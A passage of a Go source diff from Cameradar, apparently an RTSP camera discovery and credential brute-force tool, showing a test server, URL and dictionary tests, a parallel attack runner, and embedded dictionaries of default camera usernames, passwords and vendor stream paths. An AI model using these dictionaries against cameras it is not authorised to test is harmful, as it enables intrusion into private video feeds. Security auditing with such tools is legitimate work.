"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
type rtspServerConfig struct {
|
||||
allowAll bool
|
||||
allowedRoute string
|
||||
requireAuth bool
|
||||
username string
|
||||
password string
|
||||
authMethod headers.AuthMethod
|
||||
authHeader base.HeaderValue
|
||||
failOnAuth bool
|
||||
setupStatus base.StatusCode
|
||||
}
|
||||
|
||||
type testServerHandler struct {
|
||||
stream *gortsplib.ServerStream
|
||||
allowAll bool
|
||||
allowedRoute string
|
||||
requireAuth bool
|
||||
username string
|
||||
password string
|
||||
authHeader base.HeaderValue
|
||||
failOnAuth bool
|
||||
setupStatus base.StatusCode
|
||||
}
|
||||
|
||||
func (h *testServerHandler) OnDescribe(ctx *gortsplib.ServerHandlerOnDescribeCtx) (*base.Response, *gortsplib.ServerStream, error) {
|
||||
if !h.routeAllowed(ctx.Path) {
|
||||
return &base.Response{StatusCode: base.StatusNotFound}, nil, nil
|
||||
}
|
||||
|
||||
if h.failOnAuth && len(ctx.Request.Header["Authorization"]) > 0 {
|
||||
return &base.Response{StatusCode: base.StatusBadRequest}, nil, errors.New("forced auth failure")
|
||||
}
|
||||
|
||||
if h.requireAuth && !ctx.Conn.VerifyCredentials(ctx.Request, h.username, h.password) {
|
||||
return &base.Response{
|
||||
StatusCode: base.StatusUnauthorized,
|
||||
Header: base.Header{
|
||||
"WWW-Authenticate": h.authHeader,
|
||||
},
|
||||
}, nil, liberrors.ErrServerAuth{}
|
||||
}
|
||||
|
||||
return &base.Response{StatusCode: base.StatusOK}, h.stream, nil
|
||||
}
|
||||
|
||||
func (h *testServerHandler) OnSetup(ctx *gortsplib.ServerHandlerOnSetupCtx) (*base.Response, *gortsplib.ServerStream, error) {
|
||||
if !h.routeAllowed(ctx.Path) {
|
||||
return &base.Response{StatusCode: base.StatusNotFound}, nil, nil
|
||||
}
|
||||
|
||||
if h.requireAuth && !ctx.Conn.VerifyCredentials(ctx.Request, h.username, h.password) {
|
||||
return &base.Response{
|
||||
StatusCode: base.StatusUnauthorized,
|
||||
Header: base.Header{
|
||||
"WWW-Authenticate": h.authHeader,
|
||||
},
|
||||
}, nil, liberrors.ErrServerAuth{}
|
||||
}
|
||||
|
||||
status := base.StatusOK
|
||||
if h.setupStatus != 0 {
|
||||
status = h.setupStatus
|
||||
}
|
||||
|
||||
return &base.Response{StatusCode: status}, h.stream, nil
|
||||
}
|
||||
|
||||
func (h *testServerHandler) routeAllowed(path string) bool {
|
||||
path = strings.TrimLeft(path, "/")
|
||||
return h.allowAll || path == h.allowedRoute
|
||||
}
|
||||
|
||||
func startRTSPServer(t *testing.T, cfg rtspServerConfig) (netip.Addr, uint16) {
|
||||
t.Helper()
|
||||
|
||||
handler := &testServerHandler{
|
||||
allowAll: cfg.allowAll,
|
||||
allowedRoute: cfg.allowedRoute,
|
||||
requireAuth: cfg.requireAuth,
|
||||
username: cfg.username,
|
||||
password: cfg.password,
|
||||
failOnAuth: cfg.failOnAuth,
|
||||
setupStatus: cfg.setupStatus,
|
||||
}
|
||||
|
||||
if len(cfg.authHeader) > 0 {
|
||||
handler.authHeader = cfg.authHeader
|
||||
} else {
|
||||
authHeader := headers.Authenticate{
|
||||
Method: cfg.authMethod,
|
||||
Realm: "cameradar",
|
||||
}
|
||||
if cfg.authMethod == headers.AuthMethodDigest {
|
||||
authHeader.Nonce = "nonce"
|
||||
}
|
||||
handler.authHeader = authHeader.Marshal()
|
||||
}
|
||||
|
||||
server := &gortsplib.Server{
|
||||
Handler: handler,
|
||||
RTSPAddress: "127.0.0.1:0",
|
||||
AuthMethods: authMethods(cfg.authMethod),
|
||||
}
|
||||
|
||||
err := server.Start()
|
||||
require.NoError(t, err)
|
||||
t.Cleanup(server.Close)
|
||||
|
||||
desc := &description.Session{
|
||||
Medias: []*description.Media{{
|
||||
Type: description.MediaTypeVideo,
|
||||
Formats: []format.Format{&format.H264{
|
||||
PayloadTyp: 96,
|
||||
PacketizationMode: 1,
|
||||
}},
|
||||
}},
|
||||
}
|
||||
|
||||
stream := &gortsplib.ServerStream{
|
||||
Server: server,
|
||||
Desc: desc,
|
||||
}
|
||||
err = stream.Initialize()
|
||||
require.NoError(t, err)
|
||||
t.Cleanup(stream.Close)
|
||||
|
||||
handler.stream = stream
|
||||
|
||||
listener := server.NetListener()
|
||||
require.NotNil(t, listener)
|
||||
|
||||
tcpAddr, ok := listener.Addr().(*net.TCPAddr)
|
||||
require.True(t, ok)
|
||||
|
||||
return netip.MustParseAddr("127.0.0.1"), uint16(tcpAddr.Port)
|
||||
}
|
||||
|
||||
func authMethods(method headers.AuthMethod) []auth.VerifyMethod {
|
||||
switch method {
|
||||
case headers.AuthMethodDigest:
|
||||
return []auth.VerifyMethod{auth.VerifyMethodDigestMD5}
|
||||
case headers.AuthMethodBasic:
|
||||
return []auth.VerifyMethod{auth.VerifyMethodBasic}
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,86 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestBuildRTSPURL(t *testing.T) {
|
||||
stream := cameradar.Stream{
|
||||
Address: netip.MustParseAddr("192.168.0.10"),
|
||||
Port: 554,
|
||||
}
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
route string
|
||||
username string
|
||||
password string
|
||||
wantURL string
|
||||
}{
|
||||
{
|
||||
name: "empty route",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "root route",
|
||||
route: "/",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "multiple leading slashes",
|
||||
route: "////",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "route with no leading slash",
|
||||
route: "stream",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "route with leading slash",
|
||||
route: "/stream",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "route with trailing slash",
|
||||
route: "stream/",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream/",
|
||||
},
|
||||
{
|
||||
name: "route with spaces",
|
||||
route: " /stream ",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "username and password",
|
||||
route: "stream",
|
||||
username: "admin",
|
||||
password: "admin123",
|
||||
wantURL: "rtsp://admin:admin123@192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "empty username with password",
|
||||
route: "stream",
|
||||
password: "pass",
|
||||
wantURL: "rtsp://:pass@192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "username only",
|
||||
route: "stream",
|
||||
username: "user",
|
||||
wantURL: "rtsp://user:@192.168.0.10:554/stream",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
_, gotURL, err := buildRTSPURL(stream, test.route, test.username, test.password)
|
||||
require.NoError(t, err)
|
||||
require.Equal(t, test.wantURL, gotURL)
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,105 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"context"
|
||||
"runtime"
|
||||
"sync"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
type attackFn func(context.Context, cameradar.Stream) (cameradar.Stream, error)
|
||||
|
||||
func runParallel(ctx context.Context, targets []cameradar.Stream, fn attackFn) ([]cameradar.Stream, error) {
|
||||
if len(targets) == 0 {
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
workerCount := parallelWorkerCount(len(targets))
|
||||
if workerCount == 0 {
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
errCh := make(chan error, 1)
|
||||
jobs := make(chan attackJob)
|
||||
|
||||
updated := make([]cameradar.Stream, len(targets))
|
||||
copy(updated, targets)
|
||||
|
||||
ctx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
for range workerCount {
|
||||
wg.Go(func() {
|
||||
runWorker(ctx, jobs, cancel, fn, updated, errCh)
|
||||
})
|
||||
}
|
||||
|
||||
queueJobs(ctx, jobs, targets)
|
||||
close(jobs)
|
||||
|
||||
wg.Wait()
|
||||
|
||||
select {
|
||||
case err := <-errCh:
|
||||
return updated, err
|
||||
default:
|
||||
}
|
||||
|
||||
return updated, nil
|
||||
}
|
||||
|
||||
type attackJob struct {
|
||||
index int
|
||||
stream cameradar.Stream
|
||||
}
|
||||
|
||||
func queueJobs(ctx context.Context, jobs chan<- attackJob, targets []cameradar.Stream) {
|
||||
for i, stream := range targets {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case jobs <- attackJob{index: i, stream: stream}:
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func runWorker(ctx context.Context, jobs <-chan attackJob, cancelFn func(), fn attackFn, updated []cameradar.Stream, errCh chan error) {
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case job, ok := <-jobs:
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
|
||||
stream, err := fn(ctx, job.stream)
|
||||
if err != nil {
|
||||
select {
|
||||
case errCh <- err:
|
||||
default:
|
||||
}
|
||||
|
||||
cancelFn()
|
||||
return
|
||||
}
|
||||
|
||||
updated[job.index] = stream
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func parallelWorkerCount(targetCount int) int {
|
||||
if targetCount <= 0 {
|
||||
return 0
|
||||
}
|
||||
|
||||
workers := max(runtime.GOMAXPROCS(0), 1)
|
||||
if targetCount < workers {
|
||||
return targetCount
|
||||
}
|
||||
|
||||
return workers
|
||||
}
|
||||
@@ -0,0 +1,81 @@
|
||||
{
|
||||
"usernames": [
|
||||
"",
|
||||
"666666",
|
||||
"888888",
|
||||
"Admin",
|
||||
"admin",
|
||||
"admin1",
|
||||
"administrator",
|
||||
"Administrator",
|
||||
"aiphone",
|
||||
"Dinion",
|
||||
"none",
|
||||
"root",
|
||||
"Root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"ubnt"
|
||||
],
|
||||
"passwords": [
|
||||
"",
|
||||
"0000",
|
||||
"00000",
|
||||
"1111",
|
||||
"111111",
|
||||
"1111111",
|
||||
"123",
|
||||
"1234",
|
||||
"12345",
|
||||
"123456",
|
||||
"1234567",
|
||||
"12345678",
|
||||
"123456789",
|
||||
"12345678910",
|
||||
"4321",
|
||||
"666666",
|
||||
"6fJjMKYx",
|
||||
"888888",
|
||||
"9999",
|
||||
"admin",
|
||||
"admin123456",
|
||||
"admin pass",
|
||||
"Admin",
|
||||
"admin123",
|
||||
"administrator",
|
||||
"Administrator",
|
||||
"aiphone",
|
||||
"camera",
|
||||
"Camera",
|
||||
"fliradmin",
|
||||
"GRwvcj8j",
|
||||
"hikvision",
|
||||
"hikadmin",
|
||||
"HuaWei123",
|
||||
"ikwd",
|
||||
"jvc",
|
||||
"kj3TqCWv",
|
||||
"meinsm",
|
||||
"pass",
|
||||
"Pass",
|
||||
"password",
|
||||
"password123",
|
||||
"qwerty",
|
||||
"qwerty123",
|
||||
"Recorder",
|
||||
"reolink",
|
||||
"root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"support",
|
||||
"system",
|
||||
"tlJwpbo6",
|
||||
"toor",
|
||||
"tp-link",
|
||||
"ubnt",
|
||||
"user",
|
||||
"wbox",
|
||||
"wbox123",
|
||||
"Y5eIMz3C"
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,197 @@
|
||||
|
||||
live/ch01_0
|
||||
0/1:1/main
|
||||
0/usrnm:pwd/main
|
||||
0/video1
|
||||
1
|
||||
1.AMP
|
||||
1/h264major
|
||||
1/stream1
|
||||
11
|
||||
12
|
||||
125
|
||||
1080p
|
||||
1440p
|
||||
480p
|
||||
4K
|
||||
666
|
||||
720p
|
||||
AVStream1_1
|
||||
CAM_ID.password.mp2
|
||||
CH001.sdp
|
||||
GetData.cgi
|
||||
HD
|
||||
HighResolutionVideo
|
||||
LowResolutionVideo
|
||||
MediaInput/h264
|
||||
MediaInput/mpeg4
|
||||
ONVIF/MediaInput
|
||||
ONVIF/MediaInput?profile=4_def_profile6
|
||||
StdCh1
|
||||
Streaming/Channels/1
|
||||
Streaming/Unicast/channels/101
|
||||
StreamingSetting?version=1.0&action=getRTSPStream&ChannelID=1&ChannelName=Channel1
|
||||
VideoInput/1/h264/1
|
||||
VideoInput/1/mpeg4/1
|
||||
access_code
|
||||
access_name_for_stream_1_to_5
|
||||
api/mjpegvideo.cgi
|
||||
av0_0
|
||||
av2
|
||||
avc
|
||||
avn=2
|
||||
axis-media/media.amp
|
||||
axis-media/media.amp?camera=1
|
||||
axis-media/media.amp?videocodec=h264
|
||||
cam
|
||||
cam/realmonitor
|
||||
cam/realmonitor?channel=0&subtype=0
|
||||
cam/realmonitor?channel=1&subtype=0
|
||||
cam/realmonitor?channel=1&subtype=1
|
||||
cam/realmonitor?channel=1&subtype=1&unicast=true&proto=Onvif
|
||||
cam0
|
||||
cam0_0
|
||||
cam0_1
|
||||
cam1
|
||||
cam1/h264
|
||||
cam1/h264/multicast
|
||||
cam1/mjpeg
|
||||
cam1/mpeg4
|
||||
cam1/mpeg4?user='username'&pwd='password'
|
||||
cam1/onvif-h264
|
||||
camera.stm
|
||||
ch0
|
||||
ch00/0
|
||||
ch001.sdp
|
||||
ch01.264
|
||||
ch01.264?
|
||||
ch01.264?ptype=tcp
|
||||
ch1_0
|
||||
ch2_0
|
||||
ch3_0
|
||||
ch4_0
|
||||
ch1/0
|
||||
ch2/0
|
||||
ch3/0
|
||||
ch4/0
|
||||
ch0_0.h264
|
||||
ch0_unicast_firststream
|
||||
ch0_unicast_secondstream
|
||||
ch1-s1
|
||||
channel1
|
||||
gnz_media/main
|
||||
h264
|
||||
h264.sdp
|
||||
h264/ch1/sub/av_stream
|
||||
h264/media.amp
|
||||
h264Preview_01_main
|
||||
h264Preview_01_sub
|
||||
h264_vga.sdp
|
||||
h264_stream
|
||||
image.mpg
|
||||
img/media.sav
|
||||
img/media.sav?channel=1
|
||||
img/video.asf
|
||||
img/video.sav
|
||||
ioImage/1
|
||||
ipcam.sdp
|
||||
ipcam_h264.sdp
|
||||
ipcam_mjpeg.sdp
|
||||
live
|
||||
live.sdp
|
||||
live/av0
|
||||
live/ch0
|
||||
live/ch00_0
|
||||
live/ch01_0
|
||||
live/h264
|
||||
live/main
|
||||
live/main0
|
||||
live/mpeg4
|
||||
live1.sdp
|
||||
live3.sdp
|
||||
live_mpeg4.sdp
|
||||
live_st1
|
||||
livestream
|
||||
main
|
||||
media
|
||||
media.amp
|
||||
media.amp?streamprofile=Profile1
|
||||
media/media.amp
|
||||
media/video1
|
||||
medias2
|
||||
mjpeg/media.smp
|
||||
mp4
|
||||
mpeg/media.amp
|
||||
mpeg4
|
||||
mpeg4/1/media.amp
|
||||
mpeg4/media.amp
|
||||
mpeg4/media.smp
|
||||
mpeg4unicast
|
||||
mpg4/rtsp.amp
|
||||
multicaststream
|
||||
now.mp4
|
||||
nph-h264.cgi
|
||||
nphMpeg4/g726-640x
|
||||
nphMpeg4/g726-640x48
|
||||
nphMpeg4/g726-640x480
|
||||
nphMpeg4/nil-320x240
|
||||
onvif-media/media.amp
|
||||
onvif1
|
||||
pass@10.0.0.5:6667/blinkhd
|
||||
play1.sdp
|
||||
play2.sdp
|
||||
profile0
|
||||
profile1
|
||||
profile2
|
||||
profile2/media.smp
|
||||
profile5/media.smp
|
||||
rtpvideo1.sdp
|
||||
rtsp_live0
|
||||
rtsp_live1
|
||||
rtsp_live2
|
||||
rtsp_tunnel
|
||||
rtsph264
|
||||
rtsph2641080p
|
||||
snap.jpg
|
||||
stream
|
||||
stream/0
|
||||
stream/1
|
||||
stream/live.sdp
|
||||
stream.sdp
|
||||
stream1
|
||||
streaming/channels/0
|
||||
streaming/channels/1
|
||||
streaming/channels/101
|
||||
tcp/av0_0
|
||||
test
|
||||
tmpfs/auto.jpg
|
||||
trackID=1
|
||||
ucast/11
|
||||
udp/av0_0
|
||||
udp/unicast/aiphone_H264
|
||||
udpstream
|
||||
user.pin.mp2
|
||||
user=admin&password=&channel=1&stream=0.sdp?
|
||||
user=admin&password=&channel=1&stream=0.sdp?real_stream
|
||||
user=admin_password=?????_channel=1_stream=0.sdp?real_stream
|
||||
user=admin_password=R5XFY888_channel=1_stream=0.sdp?real_stream
|
||||
user_defined
|
||||
v2
|
||||
video
|
||||
video.3gp
|
||||
video.h264
|
||||
video.mjpg
|
||||
video.mp4
|
||||
video.pro1
|
||||
video.pro2
|
||||
video.pro3
|
||||
video0
|
||||
video0.sdp
|
||||
video1
|
||||
video1.sdp
|
||||
video1+audio1
|
||||
videoMain
|
||||
videoinput_1/h264_1/media.stm
|
||||
videostream.asf
|
||||
vis
|
||||
wfov
|
||||
@@ -0,0 +1,11 @@
|
||||
// Package dict bundles the default attack dictionaries into the binary
// via go:embed so they are available without any external files.
package dict

import (
	_ "embed" // blank import: enables the //go:embed directives below.
)

// defaultCredentials is the embedded JSON credentials dictionary
// (assets/credentials.json), used when no custom path is provided.
//
//go:embed assets/credentials.json
var defaultCredentials []byte

// defaultRoutes is the embedded newline-separated route list
// (assets/routes), used when no custom path is provided.
//
//go:embed assets/routes
var defaultRoutes string
|
||||
@@ -0,0 +1,134 @@
|
||||
package dict
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// credentials holds the username and password lists decoded from a JSON
// credentials dictionary (note: a struct, not a map).
type credentials struct {
	Usernames []string `json:"usernames"`
	Passwords []string `json:"passwords"`
}

// routes is a slice of routes (one RTSP path candidate per entry).
type routes []string

// Dictionary groups routes and credentials for attacks.
type Dictionary struct {
	creds  credentials // username/password candidates
	routes routes      // RTSP route candidates
}
|
||||
|
||||
// Usernames returns the usernames list.
// The returned slice is the dictionary's internal slice, not a copy.
func (d Dictionary) Usernames() []string {
	return d.creds.Usernames
}

// Passwords returns the passwords list.
// The returned slice is the dictionary's internal slice, not a copy.
func (d Dictionary) Passwords() []string {
	return d.creds.Passwords
}

// Routes returns the routes list.
// The returned slice is the dictionary's internal slice, not a copy.
func (d Dictionary) Routes() []string {
	return d.routes
}
|
||||
|
||||
// New loads a dictionary using the provided configuration.
|
||||
func New(credentialsPath, routesPath string) (Dictionary, error) {
|
||||
creds, err := loadCredentials(credentialsPath)
|
||||
if err != nil {
|
||||
return Dictionary{}, err
|
||||
}
|
||||
|
||||
routes, err := loadRoutes(routesPath)
|
||||
if err != nil {
|
||||
return Dictionary{}, err
|
||||
}
|
||||
|
||||
return Dictionary{
|
||||
creds: creds,
|
||||
routes: routes,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// loadCredentials loads credentials from a custom path or embedded defaults.
|
||||
func loadCredentials(credentialsPath string) (credentials, error) {
|
||||
if strings.TrimSpace(credentialsPath) != "" {
|
||||
content, err := os.ReadFile(credentialsPath)
|
||||
if err != nil {
|
||||
return credentials{}, fmt.Errorf("reading credentials dictionary %q: %w", credentialsPath, err)
|
||||
}
|
||||
|
||||
creds, err := parseCredentials(content)
|
||||
if err != nil {
|
||||
return credentials{}, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
creds, err := parseCredentials(defaultCredentials)
|
||||
if err != nil {
|
||||
return credentials{}, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// loadRoutes loads routes from a custom path or embedded defaults.
|
||||
func loadRoutes(routesPath string) (routes, error) {
|
||||
if strings.TrimSpace(routesPath) != "" {
|
||||
file, err := os.Open(routesPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("opening routes dictionary %q: %w", routesPath, err)
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
routes, err := parseRoutes(file)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return routes, nil
|
||||
}
|
||||
|
||||
reader := strings.NewReader(defaultRoutes)
|
||||
routes, err := parseRoutes(io.NopCloser(reader))
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return routes, nil
|
||||
}
|
||||
|
||||
func parseCredentials(content []byte) (credentials, error) {
|
||||
if len(content) == 0 {
|
||||
return credentials{}, errors.New("credentials dictionary is empty")
|
||||
}
|
||||
|
||||
var creds credentials
|
||||
err := json.Unmarshal(content, &creds)
|
||||
if err != nil {
|
||||
return credentials{}, fmt.Errorf("reading dictionary contents: %w", err)
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
func parseRoutes(reader io.ReadCloser) (routes, error) {
|
||||
defer reader.Close()
|
||||
|
||||
var routes routes
|
||||
scanner := bufio.NewScanner(reader)
|
||||
for scanner.Scan() {
|
||||
routes = append(routes, scanner.Text())
|
||||
}
|
||||
|
||||
return routes, scanner.Err()
|
||||
}
|
||||
@@ -0,0 +1,163 @@
|
||||
package dict_test
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"errors"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/dict"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestNew_LoadsDictionaryFromPaths checks the happy path: both
// dictionaries are loaded from explicit files.
// NOTE(review): this duplicates the first case of
// TestNew_CustomAndDefaultPaths below — consider removing one.
func TestNew_LoadsDictionaryFromPaths(t *testing.T) {
	tempDir := t.TempDir()
	credsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
	routesPath := writeTempFile(t, tempDir, "routes", "stream\nother\n")

	got, err := dict.New(credsPath, routesPath)
	require.NoError(t, err)

	assert.Equal(t, []string{"alice"}, got.Usernames())
	assert.Equal(t, []string{"secret"}, got.Passwords())
	assert.Equal(t, []string{"stream", "other"}, got.Routes())
}

// TestNew_CustomAndDefaultPaths exercises every combination of custom and
// default (blank/whitespace) dictionary paths.
func TestNew_CustomAndDefaultPaths(t *testing.T) {
	tempDir := t.TempDir()
	customCredsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
	customRoutesPath := writeTempFile(t, tempDir, "routes", "stream\nother\n")

	tests := []struct {
		name            string
		credentialsPath string // empty means "use embedded default"
		routesPath      string // empty means "use embedded default"
		assertFunc      func(t *testing.T, got dict.Dictionary)
	}{
		{
			name:            "custom credentials and routes",
			credentialsPath: customCredsPath,
			routesPath:      customRoutesPath,
			assertFunc: func(t *testing.T, got dict.Dictionary) {
				assert.Equal(t, []string{"alice"}, got.Usernames())
				assert.Equal(t, []string{"secret"}, got.Passwords())
				assert.Equal(t, []string{"stream", "other"}, got.Routes())
			},
		},
		{
			name:            "custom credentials default routes",
			credentialsPath: customCredsPath,
			assertFunc: func(t *testing.T, got dict.Dictionary) {
				assert.Equal(t, []string{"alice"}, got.Usernames())
				assert.Equal(t, []string{"secret"}, got.Passwords())
				assert.NotEmpty(t, got.Routes())
				assert.Contains(t, got.Routes(), "stream")
			},
		},
		{
			name:       "default credentials custom routes",
			routesPath: customRoutesPath,
			assertFunc: func(t *testing.T, got dict.Dictionary) {
				assert.NotEmpty(t, got.Usernames())
				assert.Contains(t, got.Usernames(), "admin")
				assert.NotEmpty(t, got.Passwords())
				assert.Contains(t, got.Passwords(), "admin")
				assert.Equal(t, []string{"stream", "other"}, got.Routes())
			},
		},
		{
			name:            "whitespace paths use defaults",
			credentialsPath: " \t\n",
			routesPath:      "\n\t",
			assertFunc: func(t *testing.T, got dict.Dictionary) {
				assert.NotEmpty(t, got.Usernames())
				assert.Contains(t, got.Usernames(), "admin")
				assert.NotEmpty(t, got.Passwords())
				assert.Contains(t, got.Passwords(), "admin")
				assert.NotEmpty(t, got.Routes())
				assert.Contains(t, got.Routes(), "stream")
			},
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			got, err := dict.New(test.credentialsPath, test.routesPath)
			require.NoError(t, err)
			test.assertFunc(t, got)
		})
	}
}

// TestNew_Errors covers every load failure mode: missing files, invalid
// or empty credentials JSON, and a routes line exceeding the bufio
// scanner's token limit.
func TestNew_Errors(t *testing.T) {
	tempDir := t.TempDir()
	validCredsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
	validRoutesPath := writeTempFile(t, tempDir, "routes", "stream\n")
	invalidJSONPath := writeTempFile(t, tempDir, "invalid.json", "{")
	emptyCredsPath := writeTempFile(t, tempDir, "empty.json", "")
	// A single route longer than bufio.MaxScanTokenSize makes Scan fail
	// with bufio.ErrTooLong.
	longRoute := strings.Repeat("a", bufio.MaxScanTokenSize+1)
	tooLongRoutesPath := writeTempFile(t, tempDir, "routes-too-long", longRoute)

	tests := []struct {
		name            string
		credentialsPath string
		routesPath      string
		wantErrContains string // substring expected in the error message
		wantErrIs       error  // sentinel expected in the error chain
	}{
		{
			name:            "missing credentials file",
			credentialsPath: filepath.Join(tempDir, "missing.json"),
			routesPath:      validRoutesPath,
			wantErrContains: "reading credentials dictionary",
		},
		{
			name:            "invalid credentials json",
			credentialsPath: invalidJSONPath,
			routesPath:      validRoutesPath,
			wantErrContains: "reading dictionary contents",
		},
		{
			name:            "empty credentials file",
			credentialsPath: emptyCredsPath,
			routesPath:      validRoutesPath,
			wantErrContains: "credentials dictionary is empty",
		},
		{
			name:            "missing routes file",
			credentialsPath: validCredsPath,
			routesPath:      filepath.Join(tempDir, "missing-routes"),
			wantErrContains: "opening routes dictionary",
		},
		{
			name:            "routes file too long",
			credentialsPath: validCredsPath,
			routesPath:      tooLongRoutesPath,
			wantErrIs:       bufio.ErrTooLong,
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			_, err := dict.New(test.credentialsPath, test.routesPath)
			require.Error(t, err)

			if test.wantErrContains != "" {
				assert.ErrorContains(t, err, test.wantErrContains)
			}
			if test.wantErrIs != nil {
				assert.True(t, errors.Is(err, test.wantErrIs))
			}
		})
	}
}

// writeTempFile writes content to dir/name (mode 0o600) and returns the
// full path. It fails the test on any write error.
func writeTempFile(t *testing.T, dir, name, content string) string {
	t.Helper()
	path := filepath.Join(dir, name)
	require.NoError(t, os.WriteFile(path, []byte(content), 0o600))
	return path
}
|
||||
@@ -0,0 +1,123 @@
|
||||
package output
|
||||
|
||||
import (
	"fmt"
	"net/url"
	"os"
	"path/filepath"
	"strconv"
	"strings"

	"github.com/Ullaakut/cameradar/v6"
	"github.com/Ullaakut/cameradar/v6/internal/ui"
)
|
||||
|
||||
// m3uReporter decorates another ui.Reporter: every call is forwarded to
// the wrapped reporter and, in addition, an M3U playlist of the discovered
// streams is written when the summary is produced.
type m3uReporter struct {
	delegate   ui.Reporter // reporter all calls are forwarded to
	outputPath string      // playlist destination; empty disables writing
}

// NewM3UReporter wraps the provided reporter and writes an M3U playlist on summary.
// outputPath is trimmed; a blank path turns playlist writing off.
func NewM3UReporter(delegate ui.Reporter, outputPath string) ui.Reporter {
	return &m3uReporter{
		delegate:   delegate,
		outputPath: strings.TrimSpace(outputPath),
	}
}
|
||||
|
||||
// Start forwards to the wrapped reporter.
func (r *m3uReporter) Start(step cameradar.Step, message string) {
	r.delegate.Start(step, message)
}

// Done forwards to the wrapped reporter.
func (r *m3uReporter) Done(step cameradar.Step, message string) {
	r.delegate.Done(step, message)
}

// Progress forwards to the wrapped reporter.
func (r *m3uReporter) Progress(step cameradar.Step, message string) {
	r.delegate.Progress(step, message)
}

// Debug forwards to the wrapped reporter.
func (r *m3uReporter) Debug(step cameradar.Step, message string) {
	r.delegate.Debug(step, message)
}

// Error forwards to the wrapped reporter.
func (r *m3uReporter) Error(step cameradar.Step, err error) {
	r.delegate.Error(step, err)
}
|
||||
|
||||
func (r *m3uReporter) Summary(streams []cameradar.Stream, err error) {
|
||||
r.delegate.Summary(streams, err)
|
||||
if r.outputPath == "" {
|
||||
return
|
||||
}
|
||||
|
||||
writeErr := writeM3UFile(r.outputPath, streams)
|
||||
if writeErr != nil {
|
||||
r.delegate.Error(cameradar.StepSummary, writeErr)
|
||||
}
|
||||
}
|
||||
|
||||
// UpdateSummary forwards live summary updates to the wrapped reporter,
// but only when the delegate actually implements an UpdateSummary method;
// the optional capability is detected with a type assertion.
func (r *m3uReporter) UpdateSummary(streams []cameradar.Stream) {
	updater, ok := r.delegate.(interface{ UpdateSummary([]cameradar.Stream) })
	if !ok {
		// Delegate does not support live updates; silently skip.
		return
	}
	updater.UpdateSummary(streams)
}

// Close forwards to the wrapped reporter.
func (r *m3uReporter) Close() {
	r.delegate.Close()
}
|
||||
|
||||
func writeM3UFile(path string, streams []cameradar.Stream) error {
|
||||
content := BuildM3U(streams)
|
||||
dir := filepath.Dir(path)
|
||||
if dir != "." {
|
||||
err := os.MkdirAll(dir, 0o750)
|
||||
if err != nil {
|
||||
return fmt.Errorf("creating output directory %q: %w", dir, err)
|
||||
}
|
||||
}
|
||||
|
||||
err := os.WriteFile(path, []byte(content), 0o600)
|
||||
if err != nil {
|
||||
return fmt.Errorf("writing m3u output: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildM3U creates an M3U playlist with discovered streams.
|
||||
func BuildM3U(streams []cameradar.Stream) string {
|
||||
